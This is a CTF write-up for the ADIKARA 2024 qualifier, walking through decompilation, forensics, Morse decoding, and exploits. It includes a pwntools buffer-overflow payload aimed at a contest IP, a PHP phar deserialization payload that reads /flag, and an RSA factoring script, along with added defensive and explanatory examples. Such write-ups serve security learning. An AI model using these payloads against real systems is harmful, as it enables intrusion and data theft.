# Write Up Penyisihan ADIKARA 2024
## Blaze
This thing took so long I forgot some parts of how to do this.
First, I took a look at the source code and found that it's a .NET app, and it mentions something about blazorpack, so I searched on Google for more information.
There's literally no clue. I tried forging the JWT, I tried setting cookies and headers, and not a single thing stuck.
And then I remembered, it's a freaking .NET app, I can use dnSpy!!
So I used dnSpy, but still no luck, no password, no information,
until I found out that you need to tick all of the boxes on the decompiler for it to work.

Then the username and password just magically appeared.

Honestly, what the hell, this thing took so damn long and I needed to check a few boxes?? Oh my god.
ADIKARACTF{blaze?_i_think_i_misspelled_blazor_bzbz_5b2055}
## Forensheesh
I got a .har file; I think it contains a browsing history.
https://github.com/W-zrd/Evil-Cropper, it's a repo!
It contains a Python file. I downloaded it; it needs cropped.jpg and encrypted_half.bin.
I checked the commit history; it has an "add important file" commit, and I found half of the flag!
I checked the other commits and found the cropped and encrypted half! Got it!
ADIKARACTF{so_u_are_familiar_with_har_and_python_huh_GGWP_by_Wzrd}
## Forensweet
An audio file?
Oh, it's Morse code!
I found this website that allows you to open Morse code in audio format: https://morsecode.world/international/decoder/audio-decoder-adaptive.html
Welp, I found it.
ADIKARACTF{INFODISKONAKHIRTAHUN}
## Overflow 1
Buffer overflow? Easy! Just put tons of "s" and we're done!
ADIKARACTF{OoO_ez_overflow_part_1_1fa032}
## Overflow 2
Another buffer overflow, but now I need to change the variable to 0xdeadbeef. Alright, let's do this!
First, I need to find how much I need to type before the buffer overflows. So I opened Python (I'm going to use pwntools for this one) and wrote this:
```py
from pwn import *
conn = remote("117.53.47.247", 50010)
conn.recvline()  # I did this several times
conn.send(b"s" * 60 + b"\n")  # I did this a lot while testing
```
And I found that the buffer overflows when it reaches 72 characters, so I just wrote this:
```py
conn.send((b"s" * 72) + p32(0xdeadbeef) + b"\n")
conn.recvline()  # And I got the flag!
```
ADIKARACTF{now_u_know_endianess_right?_94fc1a}
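
What the 72-byte offset and `p32(0xdeadbeef)` do, modelled offline as an added example (not the challenge's code, and not part of the original write-up). It assumes the 32-bit variable sits directly after 72 bytes of buffer and padding; the function names are made up for the illustration.

```python
import struct

OFFSET = 72            # from the write-up: bytes written before the variable is reached
FRAME = OFFSET + 4     # assumed layout: 72 bytes, then one 32-bit variable

def unbounded_read(frame: bytearray, data: bytes) -> None:
    """Model of a read with no length check (gets-style): copies everything."""
    n = min(len(data), len(frame))       # stay inside the simulated frame
    frame[:n] = data[:n]

def bounded_read(frame: bytearray, data: bytes, size: int = OFFSET) -> None:
    """Model of fgets(buf, size, ...): at most size-1 bytes plus a NUL."""
    chunk = data[:size - 1]
    frame[:len(chunk)] = chunk
    frame[len(chunk)] = 0

def variable(frame: bytearray) -> int:
    """Read the variable the way a little-endian CPU (x86) does."""
    return struct.unpack_from("<I", frame, OFFSET)[0]

def run(reader, payload: bytes) -> int:
    frame = bytearray(FRAME)             # the variable starts at 0
    reader(frame, payload)
    return variable(frame)

# pwntools' p32() packs little-endian by default: bytes ef be ad de
LITTLE = b"s" * OFFSET + struct.pack("<I", 0xDEADBEEF)
# Same value packed big-endian: bytes de ad be ef
BIG = b"s" * OFFSET + struct.pack(">I", 0xDEADBEEF)

if __name__ == "__main__":
    print(hex(run(unbounded_read, LITTLE)))  # variable becomes the target value
    print(hex(run(unbounded_read, BIG)))     # wrong byte order, wrong value
    print(hex(run(bounded_read, LITTLE)))    # bounded read never reaches it
```
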
## Snake game
Ahh, a game. 5 MB for such a simple game is kind of weird.
Using `strings` against the executable, I found this:

Yup, definitely a Python-to-exe kind of thing.
Searching on Google, I found https://pyinstxtractor-web.netlify.app/, uploaded the file, and then I got:

Well, that's a lot of files, but I am very interested in `snake.pyc`, so I just looked for a decompiler online and found https://www.pylingual.io/, which can decompile a .pyc file.

Welp, that thing is obfuscated, but no worries, there are a lot of deobfuscators online! For example, https://pyobfuscate.com/deobf
Putting the source code in, I got the get_flag function.

Then I just yanked that function and put it in Python.

Found it!
ADIKARACTF{pyth0n_is_sn4k3_bzbz_65f623}
## Lambo
OK... A file to extract a .phar file? WTF even is that?
I found [this](https://stackoverflow.com/questions/38214154/how-do-i-correctly-create-and-then-require-a-phar-file) to create a phar file, then what?

Alright, so from this code, it will load a phar file called `magic_happens_here`. What is that serialize thing?
I looked at [W3Schools](https://www.w3schools.com/php/func_var_unserialize.asp) to find some more info about this unserialize.
I tried this code to test how it works:
```php
<!DOCTYPE html>
<html>
<body>
<?php
class Helper {
    public string $file = '/flag';

    public function __construct() {}

    public function process(): void
    {
        echo file_get_contents($this->file);
    }
}

$a = serialize(new Helper);
var_dump($a);
$aa = unserialize($a);
$aa->process();
var_dump($aa);
?>
</body>
</html>
```
Ah, so when unserialized it will basically override the `$file` variable? Welp, so I just put that in and generated the phar, then it outputted
```php
O:6:"Helper":1:{s:4:"file";s:5:"/flag";}
```
Well, I don't really know why it's formatted like that, but I guess that's just PHP being PHP, I guess. Creating the phar with this
```php
<?php
$phar = new Phar('mylibrary.phar');
$phar->buildFromDirectory('phar/'); // This does the thing you actually want.
$phar->setDefaultStub('magic_happens_here');
```
and uploading what it outputted to the website, I got this!

ADIKARACTF{this_challenge_was_made_one_hour_ago_be2e51}
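
The `O:6:"Helper":1:{...}` string above is PHP's serialization format: a type tag, lengths, then the data. The following parser is an added example (Python, not part of the original write-up or the challenge) that decodes it and lists the class names a payload would instantiate; it handles only the `N`, `b`, `i`, `s`, `a` and `O` tags, and `PhpObject`, `parse` and `class_names` are names chosen here.

```python
from collections import namedtuple

PhpObject = namedtuple("PhpObject", "cls fields")

def parse(data: bytes, pos: int = 0):
    """Parse one serialized value at pos; return (value, next_pos)."""
    tag = data[pos:pos + 1]
    if tag == b"N":                              # N;
        return None, pos + 2
    if tag in (b"i", b"b"):                      # i:<int>;  b:<0|1>;
        end = data.index(b";", pos)
        num = int(data[pos + 2:end])
        return (bool(num) if tag == b"b" else num), end + 1
    if tag == b"s":                              # s:<byte length>:"<bytes>";
        colon = data.index(b":", pos + 2)
        start = colon + 2                        # skip :"
        end = start + int(data[pos + 2:colon])
        return data[start:end].decode(), end + 2  # skip ";
    if tag in (b"a", b"O"):
        cls, pos = None, pos + 2
        if tag == b"O":                          # O:<len>:"<class>":<count>:{...}
            colon = data.index(b":", pos)
            start = colon + 2
            end = start + int(data[pos:colon])
            cls, pos = data[start:end].decode(), end + 2
        colon = data.index(b":", pos)
        count, pos = int(data[pos:colon]), colon + 2  # skip :{
        fields = {}
        for _ in range(count):                   # key/value pairs follow
            key, pos = parse(data, pos)
            fields[key], pos = parse(data, pos)
        pos += 1                                 # skip }
        return (PhpObject(cls, fields) if cls else fields), pos
    raise ValueError(f"unsupported tag {tag!r} at offset {pos}")

def class_names(value):
    """Every class name the payload asks unserialize() to instantiate."""
    if isinstance(value, PhpObject):
        return {value.cls} | class_names(value.fields)
    if isinstance(value, dict):
        return set().union(*(class_names(v) for v in value.values()))
    return set()

SAMPLE = b'O:6:"Helper":1:{s:4:"file";s:5:"/flag";}'   # string from the write-up

if __name__ == "__main__":
    obj, _ = parse(SAMPLE)
    print(obj, class_names(obj))
```

On the PHP side, `unserialize($data, ['allowed_classes' => false])` refuses to instantiate any class named in the payload, which is the check `class_names` mirrors.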
## SafeRSA
I always hate encryption :/
ChatGPT spat this out:
```py
from Crypto.Util.number import long_to_bytes
from sympy import isprime
from math import isqrt
## Given values
n = 141462798088722051318799729490921841045684289129519401507458481551818501345780972050140869439773419571781243083655675803580035825559100776989995997460352754682544784811123149386346851850688727377614402261954229978269219754312075185083872573296071312565168967164450658906124427063020647048739457948457283284791
e = 65537
c = 95810701202087853841743731093149430655593147683421871799265784567546744027028327006037927756808923742806457516687369724053659801409665809484333704658005178575699287145132631020220338745054190238905155637221474537758319000878100880684173099253778386118547321637286540549815419269314760633502070855820951147798
## Step 1: Factorize n
def factorize_n(n):
    # With q = 2p + 1, n = 2p^2 + p, so p is about sqrt(n / 2)
    # and the search starts right next to it.
    for p in range(isqrt(n // 2), isqrt(n)):
        if n % p == 0 and isprime(p):
            q = n // p
            if isprime(q) and q == 2 * p + 1:
                return p, q
    raise ValueError("Failed to factorize n")

p, q = factorize_n(n)
## Step 2: Compute phi and d
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)
## Step 3: Decrypt the ciphertext
m = pow(c, d, n)
plaintext = long_to_bytes(m)
print("Recovered plaintext:", plaintext.decode())
```
ADIKARACTF{info_nilai_kalkulus_brp_bang_90afc2}
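
The script above works because the primes are related by q = 2p + 1, which turns n into a quadratic in p. As an added example (not ChatGPT's output and not the challenge's code), here is a key-audit check that generalizes this to q = k*p + c for small k and c and solves the quadratic directly; the toy primes and message are constructed, and the function names are chosen here.

```python
from math import isqrt

def find_related_factors(n, max_k=4, max_c=4):
    """Return (p, q, k, c) if n = p * (k*p + c) for small k and c, else None."""
    for k in range(1, max_k + 1):
        for c in range(-max_c, max_c + 1):
            disc = c * c + 4 * k * n         # discriminant of k*p^2 + c*p - n = 0
            r = isqrt(disc)
            if r * r != disc or (r - c) % (2 * k):
                continue                     # no integer root for this (k, c)
            p = (r - c) // (2 * k)
            q = k * p + c
            if p > 1 and q > 1 and p * q == n:
                return p, q, k, c
    return None

def decrypt(n, e, c, p, q):
    """Textbook RSA decryption once the factors are known."""
    d = pow(e, -1, (p - 1) * (q - 1))
    return pow(c, d, n)

# Constructed toy moduli (far too small for real use)
N_WEAK = 1013 * 2027      # 2027 = 2 * 1013 + 1, same relation as the challenge
N_OK = 1009 * 5003        # primes with no small linear relation
E = 65537

def audit(n):
    """Label a modulus for a key-generation review."""
    hit = find_related_factors(n)
    if hit is None:
        return "no small linear relation found"
    p, q, k, c = hit
    return f"weak: q = {k}*p + {c}, p = {p}, q = {q}"

if __name__ == "__main__":
    print(audit(N_WEAK))
    print(audit(N_OK))
    p, q, _, _ = find_related_factors(N_WEAK)
    print(decrypt(N_WEAK, E, pow(42, E, N_WEAK), p, q))   # constructed message 42
```
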